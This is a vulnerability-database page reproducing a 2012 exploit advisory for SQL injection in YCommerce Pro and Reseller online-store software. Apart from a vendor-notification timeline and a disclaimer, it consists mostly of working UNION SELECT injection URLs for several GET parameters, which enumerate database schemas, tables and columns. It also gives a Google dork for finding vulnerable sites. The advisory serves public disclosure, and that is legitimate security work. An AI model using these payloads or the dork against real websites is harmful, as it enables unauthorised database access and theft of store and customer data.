Vulners
Lucene search
YCommerce Pro / Reseller SQL Injection
🗓️ 22 Sep 2012 00:00:00Reported by Ricardo AlmeidaType 
packetstorm🔗 packetstormsecurity.com👁 26 Views
`# Exploit Title: YCommerce Pro/Reseller SQL Injection Vulnerability
# Google Dork: intext:desenvolvido por partteam.com - Plataforma YCommerce
# Date: 2012-09-21
# Exploit Author: Ricardo Almeida [email protected]
# Vendor Homepage: http://www.partteam.com
# Software Link: N/A
# Version: YCommerce Pro and YCommerce Reseller
# Tested on: N/A
# CVE: N/A
-- Affected Vendors:
---------------------
Partteam [M.S.N.F Soluções Informáticas, Lda.]
-- Affected Products:
---------------------
YCommerce [Reseller and Pro versions]
-- Disclosure Timeline:
-----------------------
2012-08-20 - Vendor Notification.
2012-08-30 - New Vendor Notification.
2012-09-20 - No Vendor Response / Feedback till date.
2012-09-21 - Public Disclosure.
Proof of Concept - YCommerce Reseller
-------------------------------------
GET Param "cPath" - [Number of columns may vary]
/store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
/store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
/store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
GET Param "news_id" - [Number of columns may vary]
/store/index.php?pag=news&news_id=-1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
Proof of Concept - YCommerce Pro
--------------------------------
GET Param "enterprise_id" - [Number of columns may vary]
/store/default.php?enterprise_id=-1 union all select 1,2,concat_ws(0x3a,table_schema,table_name,column_name),4,5,6,7 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61
GET Param "news_id" - [Number of columns may vary]
/store/index.php?pag=news&news_id=-1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
-- Disclaimer:
--------------
The information provided in this advisory is provided as it is without any warranty.
I am not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.
I do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Sep 2012 00:00Current
0.4Low risk
Vulners AI Score0.4